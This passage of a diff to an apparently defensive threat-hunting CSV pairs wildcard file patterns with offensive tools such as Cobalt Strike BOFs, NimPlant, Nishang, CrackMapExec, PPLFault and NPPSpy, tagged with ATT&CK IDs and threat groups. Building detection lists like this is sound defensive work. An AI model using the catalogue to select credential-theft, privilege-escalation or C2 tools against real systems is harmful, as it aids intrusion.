T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*/Network/PortScan/*","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rvrsh3ll/BOF_Collection","1","1","N/A","10","10","481","49","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z" "*/NewPhish.ps1*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" "*/Newtonsoft.Json.dll*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" "*/nexpose-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" @@ -4475,7 +4511,7 @@ "*/nfs-statfs.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/nginxed-root.sh*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" "*/nidem/kerberoast*","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/nidem/kerberoast","1","1","N/A","N/A","10","1282","313","2022-12-31T17:17:28Z","2014-09-22T14:46:49Z" -"*/Nightmangle.git*","offensive_tool_keyword","Nightmangle","ightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/1N73LL1G3NC3x/Nightmangle","1","1","N/A","10","10","72","10","2023-09-26T19:21:31Z","2023-09-26T18:25:23Z" +"*/Nightmangle.git*","offensive_tool_keyword","Nightmangle","ightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/1N73LL1G3NC3x/Nightmangle","1","1","N/A","10","10","73","10","2023-09-26T19:21:31Z","2023-09-26T18:25:23Z" "*/nikto.git*","offensive_tool_keyword","nikto","Nikto web server scanner","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/sullo/nikto","1","1","N/A","N/A","10","7136","1096","2023-09-18T14:44:28Z","2012-11-24T04:24:29Z" "*/nikto.pl*","offensive_tool_keyword","nikto","Nikto web scanner tool","T1210.001 - T1190 - T1046 - T1222","TA0007 - TA0002 - TA0001","N/A","N/A","Web Attacks","https://github.com/sullo/nikto","1","1","N/A","N/A","10","7136","1096","2023-09-18T14:44:28Z","2012-11-24T04:24:29Z" "*/nikto.pl*","offensive_tool_keyword","nikto","Nikto web server scanner","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/sullo/nikto","1","1","N/A","N/A","10","7136","1096","2023-09-18T14:44:28Z","2012-11-24T04:24:29Z" @@ -4488,50 +4524,52 @@ "*/nimcrypt/*","offensive_tool_keyword","nimcrypt","Nimcrypt is a .NET PE Crypter written in Nim based entirely on the work of @byt3bl33d3r's OffensiveNim project","T1027 - T1055 - T1099 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/icyguider/nimcrypt","1","1","N/A","N/A","1","83","5","2021-03-25T00:27:12Z","2021-03-24T17:51:52Z" "*/Nimcrypt2*","offensive_tool_keyword","Nimcrypt2",".NET PE & Raw Shellcode Packer/Loader Written in Nim","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/icyguider/Nimcrypt2","1","1","N/A","N/A","7","651","113","2023-01-20T22:07:15Z","2022-02-23T15:43:16Z" "*/NimExec.git*","offensive_tool_keyword","NimExec","Fileless Command Execution for Lateral Movement in Nim","T1021.006 - T1059.005 - T1564.001","TA0008 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/frkngksl/NimExec","1","1","N/A","N/A","4","307","33","2023-06-23T11:07:20Z","2023-04-21T19:46:53Z" -"*/NimPlant.*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" -"*/NimPlant/*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" -"*/nimplants/*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*/NimPlant.*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*/NimPlant/*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*/nimplants/*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" "*/ninja.crt*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*/Ninja.git*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*/ninja.key*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*/Ninja.py*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*/nipe.git","offensive_tool_keyword","nipe","An engine to make Tor Network your default gateway.","T1560 - T1573 - T1578","TA0005 - TA0007","N/A","N/A","Data Exfiltration","https://github.com/htrgouvea/nipe","1","0","N/A","N/A","10","1692","315","2023-09-22T12:35:29Z","2015-09-07T18:47:10Z" "*/nipe.pl","offensive_tool_keyword","nipe","An engine to make Tor Network your default gateway.","T1560 - T1573 - T1578","TA0005 - TA0007","N/A","N/A","Data Exfiltration","https://github.com/htrgouvea/nipe","1","1","N/A","N/A","10","1692","315","2023-09-22T12:35:29Z","2015-09-07T18:47:10Z" -"*/nishang*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security. penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1027 - T1210.001 - T1055.012 - T1047","TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" -"*/nishang/*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*/nishang*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security. penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1027 - T1210.001 - T1055.012 - T1047","TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*/nishang/*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" "*/nje-node-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/nje-pass-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/nmap.py*","offensive_tool_keyword","crackmapexec","parser nmap.py from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*/nmap_smb_scan_all_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/nmap.py*","offensive_tool_keyword","crackmapexec","parser nmap.py from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*/nmap_smb_scan_all_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "*/nntp-ntlm-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/Nofault.exe*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","410","66","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" +"*/Nofault.exe*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" "*/NoFilter.cpp*","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","1","N/A","9","3","257","42","2023-08-20T07:12:01Z","2023-07-30T09:25:38Z" "*/NoFilter.exe*","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","1","N/A","9","3","257","42","2023-08-20T07:12:01Z","2023-07-30T09:25:38Z" "*/NoFilter.git*","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","1","N/A","9","3","257","42","2023-08-20T07:12:01Z","2023-07-30T09:25:38Z" "*/NoFilter.sln*","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","1","N/A","9","3","257","42","2023-08-20T07:12:01Z","2023-07-30T09:25:38Z" "*/NoFilter.vcxproj*","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","1","N/A","9","3","257","42","2023-08-20T07:12:01Z","2023-07-30T09:25:38Z" "*/nopac.exe","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/ricardojba/noPac","1","0","N/A","N/A","1","34","5","2021-12-19T17:42:12Z","2021-12-13T18:51:31Z" -"*/No-PowerShell.cs*","offensive_tool_keyword","No-powershell","powershell script to C# (no-powershell)","T1059.001 - T1027 - T1500","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/blob/master/Misc/No-PowerShell.cs","1","1","N/A","8","10","2669","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" -"*/No-PowerShell.exe*","offensive_tool_keyword","No-powershell","powershell script to C# (no-powershell)","T1059.001 - T1027 - T1500","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/blob/master/Misc/No-PowerShell.cs","1","1","N/A","8","10","2669","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" -"*/nopowershell.git*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","761","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" -"*/nopowershell/*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","761","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" -"*/NoPowerShell/*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","761","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*/nopac.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/No-PowerShell.cs*","offensive_tool_keyword","No-powershell","powershell script to C# (no-powershell)","T1059.001 - T1027 - T1500","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/blob/master/Misc/No-PowerShell.cs","1","1","N/A","8","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*/No-PowerShell.exe*","offensive_tool_keyword","No-powershell","powershell script to C# (no-powershell)","T1059.001 - T1027 - T1500","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/blob/master/Misc/No-PowerShell.cs","1","1","N/A","8","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*/nopowershell.git*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*/nopowershell/*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*/NoPowerShell/*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" "*/noseyparker.git*","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","1","N/A","8","10","1169","56","2023-09-25T21:13:22Z","2022-11-08T23:09:17Z" "*/NotQuite0DayFriday/zip/trunk*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" "*/nowsecure/dirtycow*","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/nowsecure/dirtycow","1","1","N/A","N/A","1","93","30","2019-05-13T13:17:31Z","2016-10-22T14:00:37Z" "*/nping-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/NPPSPY.dll*","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","1","N/A","10","10","2669","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" -"*/NPPSpy.exe*","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential 